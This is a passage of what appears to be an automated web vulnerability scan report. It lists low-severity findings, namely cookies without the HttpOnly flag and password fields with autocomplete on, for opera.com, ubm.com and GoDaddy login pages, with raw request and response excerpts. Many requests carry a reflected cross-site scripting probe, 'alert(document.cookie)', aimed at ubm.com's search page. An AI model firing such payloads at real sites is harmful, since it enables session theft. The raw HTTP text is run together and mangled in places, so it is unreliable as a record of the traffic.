GET /login.asp?status=failed HTTP/1.1/login.asp/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3+server&Referrer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF%2D8%26q%3Dsmtp%2Bserver&Search=g; ASPSESSIONIDSCTSBTQQ=PLBPJOABDACEOGJJFNFHKHNJ; __utma=213119631.1093174196.1316204842.1316204842.1316204842.1; __utmb=213119631.5.10.1316204842; __utmc=213119631; __utmz=213119631.1316204842.1.1.utmgclid=CKGSi_aJoqsCFRdTgwod5zgZiw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; _chartbeat2=vs5g6yeo9lxk52er.1316204846394; ASPSESSIONIDSCTWBTQQ=DJNPJOABFNFKEADPKMALIIHA
Response
HTTP/1.1 200 OKSet-Cookie: JangoMail=Word=SMTP+server&Referrer=http%3A%2F%2Fwww%2Ejangosmtp%2Ecom%2Flogin%2Easp&Search=g; expires=Fri, 16-Dec-2011 16:30:42 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
11.69. http://www.opera.com/company/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.opera.com
Path:
/company/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:language=en2bcb5aca7750cb3d3f1fbeb1;domain=.www.opera.com;path=/;
Request
GET /company/ HTTP/1.1/addons/extensions//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.2.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/
Response
HTTP/1.1 200 OKSet-cookie: language=en2bcb5aca7750cb3d3f1fbeb1;domain=.www.opera.com;path=/; /xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" lang="en" id="company-hd" xml:lang="en">...[SNIP]...
11.70. http://www.ubm.com/en/javascripts/cache.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/javascripts/cache.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SERVERID=DP1-WEB02; path=/
Request
GET /en/javascripts/cache.js HTTP/1.1;q=0.7/site-services/search/search-result.aspx?ResultPage=1&Domain=MergeAll7a54a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eafa1cd40535&query=help%20contact
Response
HTTP/1.1 200 OK-production#sc_wede=1; path=/; HttpOnly-production#lang=en; path=/; HttpOnlySet-Cookie: SERVERID=DP1-WEB02; path=/ (function(){...[SNIP]...
11.71. http://www.ubm.com/en/javascripts/gatag.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/javascripts/gatag.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SERVERID=DP1-WEB01; path=/
Request
GET /en/javascripts/gatag.js HTTP/1.1;q=0.7/site-services/search/search-result.aspx?ResultPage=1&Domain=MergeAll7a54a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eafa1cd40535&query=help%20contact
Response
HTTP/1.1 200 OKSet-Cookie: SERVERID=DP1-WEB01; path=/ ...[SNIP]...
11.72. http://www.ubm.com/en/javascripts/menu.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/javascripts/menu.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SERVERID=DP1-WEB01; path=/
Request
GET /en/javascripts/menu.js HTTP/1.1;q=0.7/site-services/search/search-result.aspx?ResultPage=1&Domain=MergeAll7a54a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eafa1cd40535&query=help%20contact
Response
HTTP/1.1 200 OKSet-Cookie: SERVERID=DP1-WEB01; path=/ -level1 li").hover(function(){ );'display', 'block')...[SNIP]...
11.73. http://www.ubm.com/en/javascripts/search-box.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/javascripts/search-box.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SERVERID=DP1-WEB01; path=/
Request
GET /en/javascripts/search-box.js HTTP/1.1;q=0.7/site-services/search/search-result.aspx?ResultPage=1&Domain=MergeAll7a54a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eafa1cd40535&query=help%20contact
Response
HTTP/1.1 200 OKSet-Cookie: SERVERID=DP1-WEB01; path=/ (function(){ntainer input").focus(function () {, "n...[SNIP]...
11.74. http://www.ubm.com/en/javascripts/sifr3.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/javascripts/sifr3.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SERVERID=GS2-WEB01; path=/
Request
GET /en/javascripts/sifr3.js HTTP/1.1;q=0.7/site-services/search/search-result.aspx?ResultPage=1&Domain=MergeAll7a54a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eafa1cd40535&query=help%20contact
Response
HTTP/1.1 200 OK=jmbwek34kisbrfa1yjjgfo45; path=/; HttpOnlySet-Cookie: SERVERID=GS2-WEB01; path=/ *****************************************************...[SNIP]...
11.75. http://www.ubm.com/en/javascripts/snapdown.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/javascripts/snapdown.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SERVERID=GS2-WEB06; path=/
Request
GET /en/javascripts/snapdown.js HTTP/1.1;q=0.7/site-services/search/search-result.aspx?ResultPage=1&Domain=MergeAll7a54a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eafa1cd40535&query=help%20contact
Response
HTTP/1.1 200 OK=cmhl2xewnv5h4jqq3dpnva23; path=/; HttpOnlySet-Cookie: SERVERID=GS2-WEB06; path=/ .titleContent{cursor:pointer;}'););(function(){...[SNIP]...
11.76. http://www.ubm.com/en/javascripts/snapwithinsnap.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/javascripts/snapwithinsnap.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SERVERID=DP1-WEB02; path=/
Request
GET /en/javascripts/snapwithinsnap.js HTTP/1.1;q=0.7/site-services/search/search-result.aspx?ResultPage=1&Domain=MergeAll7a54a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eafa1cd40535&query=help%20contact
Response
HTTP/1.1 200 OK-production#sc_wede=1; path=/; HttpOnly-production#lang=en; path=/; HttpOnlySet-Cookie: SERVERID=DP1-WEB02; path=/ );(function(){...[SNIP]...
11.77. http://www.ubm.com/en/site-services/search/~/media/Images/U/United-Business-Media-Plc/Images/content/logo.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/site-services/search/~/media/Images/U/United-Business-Media-Plc/Images/content/logo.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SERVERID=GS2-WEB01; path=/
Request
GET /en/site-services/search/~/media/Images/U/United-Business-Media-Plc/Images/content/logo.png HTTP/1.1/*;q=0.5;q=0.7/site-services/search/search-result.aspx?ResultPage=1&Domain=MergeAll7a54a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eafa1cd40535&query=help%20contact
Response
HTTP/1.1 200 OK=311izsbligds5r3rxymup155; path=/; HttpOnlySet-Cookie: SERVERID=GS2-WEB01; path=/ .tEXtSoftware.Adobe ImageReadyq.e<.. .IDATx..].n.6.f\?..u./..S.<A.)..$.....;...N..@6..V.....d.d. ...]..;v.....IY.._I..B.p.8.y....|..s....['..........z`.3..(..3....G...[SNIP]...
11.78. http://www.ubm.com/en/site-services/search/~/media/Images/U/United-Business-Media-Plc/Images/css/favicon.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/site-services/search/~/media/Images/U/United-Business-Media-Plc/Images/css/favicon.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SERVERID=GS2-WEB01; path=/
Request
GET /en/site-services/search/~/media/Images/U/United-Business-Media-Plc/Images/css/favicon.jpg HTTP/1.1/*;q=0.5;q=0.7
Response
HTTP/1.1 200 OK=ia4yxz55ujdxe145tajm2255; path=/; HttpOnlySet-Cookie: SERVERID=GS2-WEB01; path=/ .Ducky.......P......Adobe.d..................................................... ......................................[SNIP]...
11.79. http://www.ubm.com/javascripts/gatag.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/javascripts/gatag.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SERVERID=GS2-WEB04; path=/
Request
GET /javascripts/gatag.js HTTP/1.1;q=0.7/site-services/search/search-result.aspx?ResultPage=1&Domain=MergeAll7a54a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eafa1cd40535&query=help%20contact
Response
HTTP/1.1 200 OKSet-Cookie: SERVERID=GS2-WEB04; path=/ ...[SNIP]...
11.80. http://www.ubm.com/javascripts/sitecatalyst.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/javascripts/sitecatalyst.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SERVERID=GS2-WEB03; path=/
Request
GET /javascripts/sitecatalyst.js HTTP/1.1;q=0.7/site-services/search/search-result.aspx?ResultPage=1&Domain=MergeAll7a54a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eafa1cd40535&query=help%20contact
Response
HTTP/1.1 200 OK=md0ndebkup42okr2z1wqik55; path=/; HttpOnlySet-Cookie: SERVERID=GS2-WEB03; path=/ ;...[SNIP]...
12. Password field with autocomplete enabled
previous
next
There are 32 instances of this issue:
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
12.1. https://dev.opera.com/login/
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://dev.opera.com
Path:
/login/
Issue detail
The page contains a form with the following action URL:https://dev.opera.com/login/index.pl
Request
GET /login/ HTTP/1.1/articles/javascript//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/; __utma=73838855.1311206388.1316208003.1316208003.1316208003.1; __utmb=73838855.4.10.1316208003; __utmc=73838855; __utmz=73838855.1316208003.1.1.utmcsr=opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/company/
Response
HTTP/1.1 200 OKzowMjowMA==-verification" content="L7q_7GF5c9d7ZAUYdfaTiRaB6sTAGv_cRz3nq5DsabM">...[SNIP]... <form action="/login/index.pl" method="post" name="mainlogin"> .com/articles/javascript/">...[SNIP]... <input type="password" name="passwd" id="password" required="required"> ...[SNIP]...
12.2. https://dev.opera.com/login/wronglogin.dml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://dev.opera.com
Path:
/login/wronglogin.dml
Issue detail
The page contains a form with the following action URL:https://dev.opera.com/login/index.pl
Request
GET /login/wronglogin.dml?username=xss&ref=http%3A%2F%2Fdev.opera.com%2Farticles%2Fjavascript%2F HTTP/1.1/login//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/; __utma=73838855.1311206388.1316208003.1316208003.1316208003.1; __utmb=73838855.4.10.1316208003; __utmc=73838855; __utmz=73838855.1316208003.1.1.utmcsr=opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/company/
Response
HTTP/1.1 200 OKzowMzowMA==-verification" content="L7q_7GF5c9d7ZAUYdfaTiRaB6sTAGv_cRz3nq5DsabM">...[SNIP]... <form action="/login/index.pl" method="post" name="mainlogin"> .com/articles/javascript/">...[SNIP]... <input type="password" name="passwd" id="password" required="required"> ...[SNIP]...
12.3. https://idp.godaddy.com/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/login.aspx
Issue detail
The page contains a form with the following action URL:https://idp.godaddy.com/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx Login$userEntryPanel2$PasswordTextBox
Request
GET /login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx HTTP/1.1/offers/hot-deals2.aspx?ci=51455/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; ASP.NET_SessionId=fubx1k3jh1q5dtrpmjpdfb45; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; currency1=potableSourceStr=USD; adc1=US; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:37 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form name="Form1" method="post" action="login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx" id="Form1" style="margin: 0; padding: 0;"> ...[SNIP]... <input name="Login$userEntryPanel2$PasswordTextBox" type="password" maxlength="50" id="Login_userEntryPanel2_PasswordTextBox" onkeypress="return processPasswordKeypress(event);" style="width:175px;" /> ...[SNIP]...
12.4. https://idp.godaddy.com/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/login.aspx
Issue detail
The page contains a form with the following action URL:https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3a%2f%2fwww.godaddy.com%2f Login$userEntryPanel2$PasswordTextBox
Request
POST /login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3A%2F%2Fwww.godaddy.com%2F HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; currency1=potableSourceStr=USD; adc1=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic==false&pass_focus=false&loginname=xss&password=xss&Login.x=30&Login.y=20
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:00 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form name="Form1" method="post" action="login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3a%2f%2fwww.godaddy.com%2f" id="Form1" style="margin: 0; padding: 0;"> ...[SNIP]... <input name="Login$userEntryPanel2$PasswordTextBox" type="password" maxlength="50" id="Login_userEntryPanel2_PasswordTextBox" onkeypress="return processPasswordKeypress(event);" style="width:175px;" /> ...[SNIP]...
12.5. https://idp.godaddy.com/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/login.aspx
Issue detail
The page contains a form with the following action URL:https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181
Request
POST /login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3A%2F%2Fwww.godaddy.com%2F HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; currency1=potableSourceStr=USD; adc1=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic==false&pass_focus=false&loginname=xss&password=xss&Login.x=30&Login.y=20
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:00 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181" onsubmit="return pcj_login_action(this);"> ...[SNIP]... <input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" /> ...[SNIP]...
12.6. https://idp.godaddy.com/retrieveaccount.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/retrieveaccount.aspx
Issue detail
The page contains a form with the following action URL:https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181
Request
GET /retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB181 HTTP/1.1/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3A%2F%2Fwww.godaddy.com%2F/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ASP.NET_SessionId=fubx1k3jh1q5dtrpmjpdfb45; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:11 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181" onsubmit="return pcj_login_action(this);"> ...[SNIP]... <input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" /> ...[SNIP]...
12.7. https://idp.godaddy.com/shopper_new.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/shopper_new.aspx
Issue detail
The page contains a form with the following action URL:https://idp.godaddy.com/shopper_new.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181 shopper_password shopper_password2
Request
GET /shopper_new.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181 HTTP/1.1/retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB181/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ASP.NET_SessionId=fubx1k3jh1q5dtrpmjpdfb45; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:18 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... <form name="Form1" method="post" action="shopper_new.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181" onsubmit="javascript:return WebForm_OnSubmit();" id="Form1" style="margin: 0; padding: 0;"> ...[SNIP]... <input name="shopper_password" type="password" maxlength="25" id="shopper_password" class="normal_text" size="25" /> <span class="requiredText">...[SNIP]... <input name="shopper_password2" type="password" maxlength="25" id="shopper_password2" class="normal_text" size="25" /> <span class="requiredText">...[SNIP]...
12.8. https://idp.godaddy.com/shopper_new.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/shopper_new.aspx
Issue detail
The page contains a form with the following action URL:https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181
Request
GET /shopper_new.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181 HTTP/1.1/retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB181/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ASP.NET_SessionId=fubx1k3jh1q5dtrpmjpdfb45; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:18 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... <form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181" onsubmit="return pcj_login_action(this);"> ...[SNIP]... <input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" /> ...[SNIP]...
12.9. https://login.secureserver.net/
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://login.secureserver.net
Path:
/
Issue detail
The page contains a form with the following action URL:https://login.secureserver.net/?app=wbe&target=login
Request
POST /?app=wbe HTTP/1.1server.net/?app=wbeserver.net-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=wbe&username=xss&password=xss&sftur=NDQ4fFIlJ0iHschOTVGqsaiSOshLLxD5uIekHwXJXxT6nLGMPkkcBk8GmTcWx1w23%2F60%2Bbzg78VZBK59bluCy7ZbCrI%2FqYycGWtEQ55VjXqiTZDRF3HjN4SHU4uRjJ6V1KMDSEQ...[SNIP]...
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form action="?app=wbe&target=login" method="POST" id="login_form" name="login_form"> ...[SNIP]... <input id="password" type="password" name="password" value="" onkeyup="return Login.catchEnter(event);"> ...[SNIP]...
12.10. https://login.secureserver.net/
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://login.secureserver.net
Path:
/
Issue detail
The page contains a form with the following action URL:https://login.secureserver.net/?app=mmail&target=login
Request
GET /?app=mmail&target=login HTTP/1.1server.net/?app=wbe/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form action="?app=mmail&target=login" method="POST" id="login_form" name="login_form"> ...[SNIP]... <input id="password" type="password" name="password" value=""> ...[SNIP]...
12.11. https://login.secureserver.net/
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://login.secureserver.net
Path:
/
Issue detail
The page contains a form with the following action URL:https://login.secureserver.net/?app=wbe
Request
GET /?app=wbe HTTP/1.1/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form action="?app=wbe" method="POST" id="login_form" name="login_form"> ...[SNIP]... <input id="password" type="password" name="password" value="" onkeyup="return Login.catchEnter(event);"> ...[SNIP]...
12.12. https://my.opera.com/community/signup/
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://my.opera.com
Path:
/community/signup/
Issue detail
The page contains a form with the following action URL:https://my.opera.com/community/signup/signup.pl
Request
GET /community/signup/?s_ref=home HTTP/1.1/community//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/; __utma=218314117.1470107793.1316208001.1316208001.1316208001.1; __utmb=218314117.1.10.1316208001; __utmc=218314117; __utmz=218314117.1316208001.1.1.utmcsr=opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/company/
Response
HTTP/1.1 200 OKzowMTowMA==-verification" content="L7q_7GF5c9d7ZAUYdfaTiRaB6sTAGv_cRz3nq5DsabM">...[SNIP]... <form action="/community/signup/signup.pl" method="post" name="newusersignup"> .com/community/">...[SNIP]... <input type="password" name="password" value="" id="enter-password" required="required" title="Please enter a password that's at least 5 characters long."> ...[SNIP]...
12.13. https://mya.godaddy.com/Default.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://mya.godaddy.com
Path:
/Default.aspx
Issue detail
The page contains a form with the following action URL:https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDMYA-M1PWMYAWEB003
Request
GET /Default.aspx?idpinfo=none&myaurl=%2fdefault.aspx&ci=13025 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; adc1=US; traffic=; ASP.NET_SessionId=sxaobr55fgak5g55bzrndx2d
Response
